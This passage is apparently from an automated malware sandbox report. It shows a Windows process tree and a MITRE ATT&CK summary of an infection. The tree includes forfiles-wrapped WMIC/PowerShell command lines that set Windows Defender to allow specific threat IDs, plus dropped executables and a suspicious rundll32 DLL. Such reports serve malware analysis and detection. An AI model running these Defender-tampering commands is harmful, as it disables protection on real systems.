        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:6628
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:6996
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:6172
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:4216
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:7852
- C:\Users\Admin\AppData\Roaming\stgbdvv
  C:\Users\Admin\AppData\Roaming\stgbdvv
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5500
- C:\Users\Admin\AppData\Roaming\stgbdvv
  C:\Users\Admin\AppData\Roaming\stgbdvv
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:7672
- C:\Users\Admin\AppData\Roaming\stgbdvv
  C:\Users\Admin\AppData\Roaming\stgbdvv
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:988
- \??\c:\windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  2⤵
  PID:7908
- \??\c:\windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  2⤵
  PID:2596

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Executes dropped EXE
PID:1536
- C:\Users\Admin\AppData\Local\Temp\is-4DR8N.tmp\setup_2.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-4DR8N.tmp\setup_2.tmp" /SL5="$20208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of FindShellTrayWindow
  PID:2648

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:508
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4700

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:968
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:4028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4244

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5532

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:7120

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5540
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A95674F6BE2296E8121271ACE8416019 C
  2⤵
  - Loads dropped DLL
  PID:6268
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FA84F76C8408063D5B56068B1E274A3B
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:7152
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5592
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8136
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 54CF04E92AA7D05DDCB686EF15B1D595 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:8048

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
PID:7548

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8048
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:8060

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:7344

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:8132
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
  2⤵
  - Modifies system executable filetype association
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies registry class
  PID:4256
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    PID:3456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5052

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6536

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7144

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5372

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7408

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7424

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:1456

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:4028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6916

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6488

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7208

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
1⤵
PID:1232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:1884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4364

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6788

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:5528

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7312

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7564

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery